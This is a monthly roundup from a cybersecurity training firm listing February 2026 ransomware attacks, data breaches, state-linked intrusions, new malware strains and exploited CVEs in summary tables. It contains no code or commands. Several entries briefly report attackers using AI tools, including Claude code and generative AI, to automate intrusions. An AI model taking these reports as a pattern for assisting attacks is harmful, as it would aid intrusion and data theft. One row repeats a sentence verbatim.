February 2026 delivered another stark reminder that no sector is immune from cyber disruption. From financial platforms like Betterment and PayPal, to critical financial infrastructure such as France’s National Bank Account Registry (FICOBA), attackers continued to exploit credential weaknesses, third-party dependencies and identity-driven vulnerabilities.
Meanwhile, incidents impacting Iron Mountain, Panera Bread, BridgePay, SmarterTools, Step Finance, Advantest Corporation and even nation-state targets demonstrated the expanding surface area of modern digital ecosystems.
This month’s compilation highlights a troubling pattern: the growing dominance of identity compromise, data exposure without extortion, and attacks that ripple far beyond a single organisation. Whether it was financial data, payment infrastructure, enterprise systems, or national registries, the common thread was operational impact and trust erosion. The line between commercial breach and systemic risk continues to blur and response speed now defines resilience.
At Cyber Management Alliance, we help organisations prepare for exactly these scenarios. Through our NCSC-Assured Cyber Incident Planning & Response training, expert-led cyber tabletop exercises, and bespoke incident response playbook workshops, we equip teams to respond decisively and recover with confidence. Because in today’s threat landscape, agility in response is not optional. It is your competitive advantage.
|
Date |
Victim |
Summary |
Threat Actor |
Business Impact |
Source Link |
|
February 04, 2026 |
Organisations running vulnerable VMware ESXi environments |
CISA: VMware ESXi flaw now exploited in ransomware attacks |
Unknown |
Ransomware operators actively exploited a critical VMware ESXi sandbox-escape vulnerability to gain deep access to virtualized environments, increasing the risk of enterprise system compromise and data exposure. |
|
|
February 05, 2026 |
Sapienza University |
One of Europe’s largest universities knocked offline for days after cyber attack |
Femwar02 (linked to use of BabLock/Rorschach malware). |
The cyber attack forced Sapienza University of Rome to shut down major IT systems for several days, disrupting online services and limiting communications while recovery efforts were carried out using unaffected backups. |
|
|
February 05, 2026 |
Conpet S.A. |
Romanian oil pipeline operator Conpet discloses cyber attack |
Qilin Ransomware |
The ransomware attack disrupted Conpet’s corporate IT systems and website and involved the claimed theft of large volumes of internal data, although core oil transport operations continued to run normally. |
Source: Bleeping Computer |
|
February 07, 2026 |
BridgePay |
Payments platform BridgePay confirms ransomware attack behind outage |
Unknown |
The ransomware attack disrupted BridgePay’s payment infrastructure nationwide, knocking critical processing systems offline and forcing many businesses to switch to cash-only transactions while services were being restored. |
Source: Bleeping Computer |
|
February 09, 2026 |
SmarterTools |
Hackers breach SmarterTools network using flaw in its own software |
Warlock Ransomware |
SmarterTools was breached after attackers exploited an unpatched instance of its own SmarterMail software, allowing them to compromise internal systems and multiple Windows servers, though customer data and core business services were not affected. |
Source: Bleeping Computer |
|
February 20, 2026 |
University of Mississippi Medical Center |
University of Mississippi Medical Center closes clinics after ransomware attack |
Unknown |
A ransomware attack crippled the University of Mississippi Medical Center’s IT systems—including its electronic health records—forcing statewide clinic closures, cancellation of surgeries and appointments, and reliance on manual processes for patient care. |
Source: Bleeping Computer |
|
February 20, 2026 |
Organizations using BeyondTrust remote access and support products |
CISA: BeyondTrust RCE flaw now exploited in ransomware attacks |
Unknown |
Attackers actively exploited a critical BeyondTrust remote access vulnerability to gain unauthorized control, deploy malicious tools, and carry out ransomware-related intrusions against affected organizations. |
Source: Bleeping Computer |
|
February 20, 2026 |
Advantest Corporation |
Advantest Corporation Hit by Ransomware Attack |
Unknown |
The company detected a ransomware intrusion in its internal IT network, prompting system isolation and an investigation to contain the incident and assess potential operational impact while maintaining unaffected environments. |
Source: Bleeping Computer
|
|
February 21, 2026 |
UAE’s unnamed National Network |
UAE foils cyber attacks, state news agency says |
Unknown |
The United Arab Emirates said it successfully blocked organised cyber attacks that tried to infiltrate national networks, deploy ransomware and run widespread phishing campaigns aimed at government and vital digital infrastructure while no specific threat actor was identified in the report. |
Source: Reuters |
|
February 24, 2026 |
Marquis Health |
Marquis blames ransomware breach on SonicWall cloud backup hack |
Unknown |
Marquis Health attributed a ransomware breach to a compromise of its SonicWall cloud backup systems that allowed attackers to encrypt data and disrupt operations at its facilities and although the specific ransomware group was not publicly confirmed the incident exposed weaknesses in third-party backup protections. |
Source: Bleeping Computer
|
|
Date |
Victim |
Summary |
Threat Actor |
Business Impact |
Source Link |
|
February 01, 2026 |
NationStates |
NationStates confirms data breach; shuts down game site |
Unknown |
The breach forced NationStates to take its website offline and rebuild systems after unauthorised server access exposed user account data such as email addresses, password hashes, and login information, disrupting service while security investigations and remediation were carried out. |
Source: Bleeping Computer |
|
February 01, 2026 |
Panera Bread |
Panera Bread breach impacts 5.1 million accounts, not 14 million customers |
ShinyHunters |
The incident exposed personal contact information for about 5.1 million user accounts and led to the public leak of stolen data after an extortion attempt failed, putting affected individuals at risk of phishing and identity-related misuse. |
|
|
February 03, 2026 |
Coinbase |
Coinbase confirms insider breach linked to leaked support tool screenshots |
Unknown |
Coinbase confirmed that insiders were manipulated or bribed to misuse internal support tools, allowing attackers to access and leak limited customer account data and screenshots, raising concerns over social-engineering risks rather than a direct system hack. |
Source: Bleeping Computer |
|
February 05, 2026 |
Substack |
Substack data breach notification |
Unknown |
Substack disclosed that unauthorised access to its systems exposed users’ contact details, such as email addresses and phone numbers, prompting notifications and warnings about potential phishing risks, though sensitive financial data was not compromised. |
|
|
February 05, 2026 |
Fintech firm Betterment |
Fintech firm Betterment confirms data breach after hackers send fake crypto scam notification to users |
Unknown |
The incident exposed customer contact details that were then used to send convincing fake crypto-investment messages, raising risks of phishing and identity theft even though account passwords and financial systems were not compromised. |
|
|
February 06, 2026 |
Flickr (the organisation) |
Flickr discloses potential data breach exposing users’ names, emails etc. |
Unknown |
Flickr had alerted users that a security issue at a third-party email service provider may have exposed personal details such as names, email addresses, IP data, and account activity, though no passwords or payment information were compromised. |
Source: Bleeping Computer |
|
February 10, 2026 |
Volvo Group North America (indirectly affected as a customer of Conduent) |
Volvo Group North America customer data exposed in Conduent hack |
Unknown |
A third-party breach at Conduent exposed sensitive personal information of nearly 17,000 Volvo Group North America customers and employees, after attackers accessed and stole data from the service provider’s systems. |
Source: Bleeping Computer |
|
February 11, 2026 |
Microsoft |
Microsoft Store Outlook add-in hijacked to steal 4,000 Microsoft accounts |
Unknown |
Attackers compromised a legitimate Outlook add-in listed on Microsoft Store and used it to harvest credentials, resulting in the theft of roughly 4,000 Microsoft user accounts. |
Source: Bleeping Computer |
|
February 12, 2026 |
Odido |
Odido data breach exposes personal information of 6.2 million customers |
Unknown |
A cyber incident had exposed the personal information of millions of Odido customers after unauthorised access to a customer contact system, though core services continued to run normally. |
Source: Bleeping Computer |
|
February 18, 2026 |
Figure Technology Solutions |
Data breach at fintech giant Figure affects close to a million customers |
ShinyHunters |
Hackers breached Figure Technology Solutions and exposed sensitive personal data of nearly one million customers, including contact details and dates of birth, after stealing files from the company’s systems. |
Source: TechCrunch |
|
February 19, 2026 |
France’s National Bank Account Registry |
Attackers breach France national bank account database |
Unknown |
Attackers gained unauthorised access to France’s national bank account registry and exposed sensitive records linked to roughly 1.2 million accounts, raising risks of fraud and phishing even though no transactions were carried out. |
|
|
February 20, 2026 |
PayPal |
PayPal discloses data breach exposing users' personal information |
Unknown |
A software error in PayPal’s loan application had exposed sensitive personal data of a limited number of users for several months, creating privacy risks even though the company said its core systems were not hacked. |
Source: Bleeping Computer |
|
February 24, 2026 |
CarGurus |
ShinyHunters cyber attack on CarGurus impacts 12.4 million users |
ShinyHunters |
A cyber attack on the online auto marketplace CarGurus exposed account records and impacted about 12.4 million users forcing the company to reset passwords and notify affected customers when the breach was discovered. |
|
|
February 24, 2026 |
Wynn Resorts |
Wynn Resorts says hackers acquired employee data |
ShinyHunters |
Wynn Resorts confirmed that hackers had stolen employee information from its systems and began investigating the breach that led to unauthorised access to staff data and a ransom demand. |
Source: Reuters |
|
February 25, 2026 |
UFP Technologies |
Medical device maker reports data theft hack to SEC |
Unknown |
UFP Technologies reported to regulators that a cyber attack discovered on February 14 resulted in hackers stealing or destroying company data from the medical device maker’s systems and forced the company to disclose the incident to the U.S. Securities and Exchange Commission. |
|
Date |
Victim |
Summary |
Threat Actor |
Business Impact |
Source Link |
|
February 02, 2026 |
Notepad++ |
Notepad++ says Chinese government hackers hijacked its software updates for months |
Lotus Blossom (China-linked state-sponsored group) |
The attack quietly abused Notepad++’s software update system for months in 2025 to deliver malicious versions of the programme to selected targets, giving attackers hands-on access to affected machines and turning a trusted update channel into a supply-chain intrusion vector. |
Source: TechCrunch |
|
February 02, 2026 |
OpenVSX development extensions |
New GlassWorm attack targets macOS via compromised OpenVSX extensions |
GlassWorm |
The campaign compromised trusted OpenVSX development extensions to silently infect macOS users, enabling attackers to steal passwords, developer credentials, and cryptocurrency wallet data while gaining remote access to affected machines through a software supply-chain breach. |
Source: Bleeping Computer |
|
February 03,2026 |
Iron Mountain |
Iron Mountain hackers claim 1.4 TB theft; company says impact limited |
Everest (Extortion group) |
Iron Mountain confirmed it had investigated claims of a breach after attackers alleged stealing company data, but the incident was contained and largely limited in scope with no evidence of widespread compromise to core customer systems. |
|
|
February 03,2026 |
Step Finance |
Step Finance says compromised execs' devices led to $40M crypto theft |
Unknown |
Step Finance suffered a major security incident in which attackers allegedly compromised executives’ devices to gain privileged access and drain roughly $40 million in cryptocurrency from treasury wallets, forcing operational pauses and emergency security actions. |
Source: Bleeping Computer |
|
February 04,2026 |
Organisations running misconfigured or exposed NGINX web servers |
Hackers compromise NGINX servers to redirect user traffic |
Unknown |
Attackers compromised NGINX servers by secretly altering configuration files to hijack and reroute legitimate website traffic through their own infrastructure, enabling interception of sensitive data and potential manipulation of user sessions without disrupting site functionality. |
|
|
February 09,2026 |
European Union and the Government of the Netherlands (including agencies using the affected Ivanti systems). |
EU, Dutch government announce hacks exploiting Ivanti zero-days |
Unknown |
Hackers exploited critical Ivanti zero-day vulnerabilities to gain unauthorized access to systems used by European and Dutch government bodies, raising concerns about potential exposure of sensitive institutional data and prompting urgent mitigation efforts. |
Source: Record Media |
|
February 09, 2026 |
Singapore’s four major telecom operators — Singtel, StarHub, M1, and Simba Telecom. |
Chinese Cyberspies Breach Singapore's Four Largest Telcos |
UNC3886 (China-nexus cyber-espionage group) |
Chinese state-linked hackers infiltrated parts of Singapore’s major telecom networks in a covert espionage campaign, gaining limited access and extracting some technical data without disrupting services or exposing customer information. |
Source: Bleeping Computer |
|
February 23, 2026 |
FortiGate firewalls |
Russian hackers used generative AI to compromise FortiGate firewalls, researchers say |
Unknown |
The campaign saw a Russian-speaking threat actor use generative-AI-assisted automation to exploit weakly secured management interfaces and credentials, compromising hundreds of Fortinet FortiGate devices worldwide and exposing organizations to unauthorized access and potential data theft. |
Source: Record Media |
|
February 24, 2026 |
Freight & Logistic firm: DAT Truckstop, TIMOCOM, Teleroute, Penske Logistics, Girteka, and Electronic Funds Source (EFS) |
Phishing campaign targets freight and logistics orgs in the US Europe |
TA2541 threat actor |
A widespread phishing campaign targeted freight and logistics companies across the United States and Europe with fake login pages and malicious links to steal credentials and gain unauthorized access, and researchers linked the activity to the TA2541 threat actor as part of their cyber-espionage operations. |
Source: Bleeping Computer |
|
February 28, 2026 |
Iran’s critical infrastructure internet connectivity and communication systems |
Israel plunges Iran into darkness with the largest cyber attack in history |
Israeli cyber operations units and allied intelligence forces (as reported in the context of Operation Roar of the Lion) |
Israel’s cyber forces executed an unprecedented large-scale cyber attack that supposedly disrupted Iran’s critical infrastructure internet connectivity and communication systems leaving government networks in digital blackout alongside coordinated physical military strikes. |
|
|
February 28, 2026 |
Government systems in Mexico |
Hackers weaponise Claude code in Mexican government cyber attack |
Unknown |
Government systems in Mexico were breached when attackers abused legitimate Claude AI code to help orchestrate and automate the cyber attack causing data exposure and operational disruptions. |
Source: Security Week |
|
February 28, 2026 |
Iranian prayer app Zekr |
Hacked prayer app sends surrender messages to Iranians amid Israeli strikes |
Unknown |
The popular Iranian prayer app Zekr was compromised and used to send pre written surrender and propaganda messages to users during Israeli strikes disrupting the app’s normal religious functions and eroding trust among its millions of users |
|
New Ransomware |
Summary |
|
GridTide Malware |
A previously unseen espionage-style backdoor malware called GridTide was discovered being used by a Chinese-linked threat actor (UNC2814) in a campaign targeting government and telecom networks around the world. |
|
Dohdoor Malware |
Security researchers flagged a new malicious backdoor named Dohdoor being used by a threat actor tracked as UAT-10027, using DNS-over-HTTPS for command and control in cloud environments. |
|
Ndm448 Ransomware |
Threat intelligence monitoring identified Ndm448 Ransomware in underground forums as a newly observed ransomware strain targeting Windows machines. |
|
Ransoomed Ransomware |
Another newly observed ransomware strain called Ransoomed was discovered by threat analysts as part of ongoing monitoring, indicating additional active developments in the ransomware landscape. |
|
PromptSpy Malware |
Security researchers identified PromptSpy, an advanced Android malware using generative AI to persist, adapt to the environment and enable remote control via VNC, representing a pioneering AI-based mobile threat. |
Source for the above table: Bleeping Computer
|
Date |
New Flaws/Fixes |
Summary |
|
February 02, 2026 |
CVE-2026-21509 |
Russian state-linked hackers quickly took advantage of a newly fixed Microsoft Office weakness by sending weaponized documents that installed malware on unpatched systems, allowing them to infiltrate and maintain access to targeted organisations. |
|
February 03,2026 |
CVE-2025-11953 |
Attackers exploited a critical flaw in React Native’s Metro development server to send crafted requests that executed malicious code and deployed malware on exposed developer machines, turning unsecured dev environments into an entry point for broader compromise. |
|
February 03,2026 |
CVE-2025-40551 |
Cybersecurity and Infrastructure Security Agency warned that attackers had been actively exploiting a critical remote-code-execution flaw in SolarWinds Web Help Desk and urged organizations to patch immediately after adding it to the Known Exploited Vulnerabilities catalogue. |
|
February 04,2026 |
CVE-2025-68613 |
Researchers disclosed multiple critical vulnerabilities in the n8n workflow automation platform that could let attackers escape the intended environment and seize full control of the underlying server, with public proof-of-concept exploits increasing the risk of real-world compromise. |
|
February 04,2026 |
CVE-2021-39935 |
The Cybersecurity and Infrastructure Security Agency had warned that attackers were actively exploiting a five-year-old GitLab vulnerability, urging organisations to patch urgently to prevent unauthorised access and potential follow-on compromises. |
|
February 04,2026 |
CVE-2025-8088 |
The newly identified Amaranth Dragon cyber-espionage group exploited a WinRAR vulnerability to infiltrate targeted government and law-enforcement organisations, deploying stealthy malware and remote-access tools to maintain persistence and conduct intelligence-gathering operations. |
|
February 09, 2026 |
CVE-2025-40551, |
Attackers exploited critical flaws in SolarWinds Web Help Desk to gain remote code execution and covertly deployed legitimate tools like Velociraptor to maintain access, move laterally, and evade detection inside targeted networks. |
|
February 11, 2026 |
CVE-2026-20841 |
A vulnerability in Windows 11 Notepad allowed specially crafted Markdown links to silently execute files, potentially enabling remote code execution, and the issue was reported and later addressed by Microsoft. |
|
February 17, 2026 |
CVE-2026-22769 |
Chinese state-backed hackers had been exploiting a critical zero-day flaw in Dell RecoverPoint for Virtual Machines since mid-2024 to gain unauthorised access and maintain persistent control inside targeted networks. |
|
February 17, 2026 |
CVE-2025-65715, CVE-2025-65716, CVE-2025-65717 |
Security researchers discovered multiple high- to critical-severity flaws in widely used Visual Studio Code extensions that could have allowed attackers to steal local files and achieve remote code execution, putting millions of developer environments at risk. |
|
February 18, 2026 |
CVE-2026-24423, CVE-2026-23760 |
Threat actors rapidly weaponized newly disclosed SmarterMail vulnerabilities by sharing exploits, tools, and stolen admin credentials on Telegram within days, enabling real-world intrusions and paving the way for ransomware-style attacks. |
|
February 18, 2026 |
CVE-2026-1670 |
Security researchers reported that multiple Honeywell CCTV models contained a critical authentication bypass flaw that could have allowed unauthenticated attackers to take over accounts and gain unauthorised access to camera feeds. |
|
February 19, 2026 |
CVE-2026-21486 |
A vulnerability in Grandstream VoIP phones could have allowed attackers to silently eavesdrop on calls and access internal device interfaces, posing a serious risk to privacy and communications security until it was disclosed. |
|
February 19, 2026 |
CVE 2025 7702 |
A critical remote code execution vulnerability was discovered in over a dozen Zyxel router models that could let attackers execute malicious code on unpatched devices and put home and business networks at risk. |
Source for the above table: Bleeping Computer, Recorded Future
|
News Type |
Summary |
|
Advisory |
Apple’s new “Limit Precise Location” feature reduces the risk of unwanted carrier-based tracking by allowing cellular networks to see only a user’s approximate location rather than an exact address, strengthening overall privacy safeguards. |
|
Warning |
Attackers are continuing to exploit poorly secured, internet-exposed MongoDB databases by automatically wiping or stealing data and demanding small Bitcoin ransoms, showing that simple misconfigurations still leave many organizations vulnerable to opportunistic extortion campaigns. |
|
Warning |
A significant global wave of high-yield investment program scams had emerged, using convincing websites and aggressive online promotions to promise extraordinary profits while secretly running Ponzi-style operations that vanished once they had drawn in enough victim funds. |
|
Report |
The UK’s data-protection regulator opened an investigation into X to examine whether its Grok AI system had improperly used personal data and failed to prevent the creation and spread of non-consensual sexual deepfakes, raising concerns about compliance with privacy and online-safety laws. |
|
Report |
The article reported that organisations had begun treating AI agents as non-human identities and were building a new identity-centric security control plane so CISOs could govern, monitor, and limit autonomous AI access just like any other privileged account. |
|
Report |
The Zendesk spam campaign resurfaced and targeted users with a surge of fake “activate account” emails that impersonated legitimate notifications, aiming to trick recipients into engaging with phishing content and creating confusion across affected organisations. |
|
Warning |
Attackers actively exploited a five-year-old GitLab vulnerability to target unpatched systems, prompting CISA to warn organisations to urgently secure exposed instances to prevent unauthorized access and abuse. |
|
Report |
The article explained that organizations increasingly relied on non-human identities (such as service accounts, APIs, and automation tools), which had expanded the attack surface and created significant security blind spots if not properly governed and monitored. |
|
Report |
Ransomware actors abused legitimate ISPsystem VMmanager virtual machines to quietly host and deliver malicious payloads, blending their infrastructure with normal environments to evade detection and make takedowns harder. |
|
Report |
Attackers abused legitimate Zendesk features to generate massive volumes of fake support emails that bypassed spam filters and flooded users’ inboxes, creating disruption and confusion but not delivering malware. |
|
Warning |
CISA warned that a critical SmarterMail vulnerability was actively exploited by ransomware actors to gain unauthorized remote code execution on vulnerable email servers, prompting urgent patching and mitigation actions. |
|
Warning |
German authorities warned that attackers used sophisticated phishing and social-engineering tactics to hijack Signal accounts of senior politicians, military personnel, and journalists to gain access to sensitive communications. |
|
Warning |
BeyondTrust had warned that a critical vulnerability in its Remote Support and Privileged Remote Access tools could let unauthenticated attackers run malicious code, potentially leading to system compromise, data theft, or service disruption if organizations failed to patch quickly. |
|
Report |
Microsoft acknowledged that a filtering issue in Exchange Online had mistakenly flagged many legitimate emails as phishing, causing them to be quarantined and disrupting normal business communications until mitigations were applied. |
|
Report |
Attackers built highly customised password-guessing lists using publicly available information and contextual clues about targets—such as language, demographics, or leaked data—making traditional guessing attacks far more effective even without AI. |
|
Report |
South Korean regulators fined the companies a combined $25 million after investigations found inadequate security controls led to unauthorised access and exposure of millions of customers’ personal data. |
|
Report |
A security analysis revealed that a single coordinated threat actor had been responsible for about 83% of recent exploitation attempts targeting Ivanti remote code execution vulnerabilities, showing a highly focused and persistent campaign rather than widespread unrelated attacks. |
|
Report |
Texas filed a lawsuit against TP-Link alleging the company misled consumers about product security while its devices were linked to potential exploitation risks by Chinese state-sponsored hackers. |
|
Report |
The Federal Bureau of Investigation reported that a surge in ATM “jackpotting” malware attacks in 2025 led to criminals illegally forcing machines to dispense cash, causing losses exceeding $20 million and highlighting a growing threat to financial institutions. |
|
Report |
Chinese state-linked cyber spies infiltrated dozens of telecommunications companies and government agencies around the world to steal sensitive data and gain long-term access to critical networks in a sustained espionage campaign.Chinese state-linked cyber spies infiltrated dozens of telecommunications companies and government agencies around the world to steal sensitive data and gain long-term access to critical networks in a sustained espionage campaign. |
|
Report |
U.S. authorities sanctioned a Russian-linked exploit broker who bought and sold stolen zero-day vulnerabilities to criminal and state-linked hackers, aiming to disrupt global cybercrime operations and deter abusive use of critical exploits. |
Sources: Bleeping Computer and Infosecurity Magazine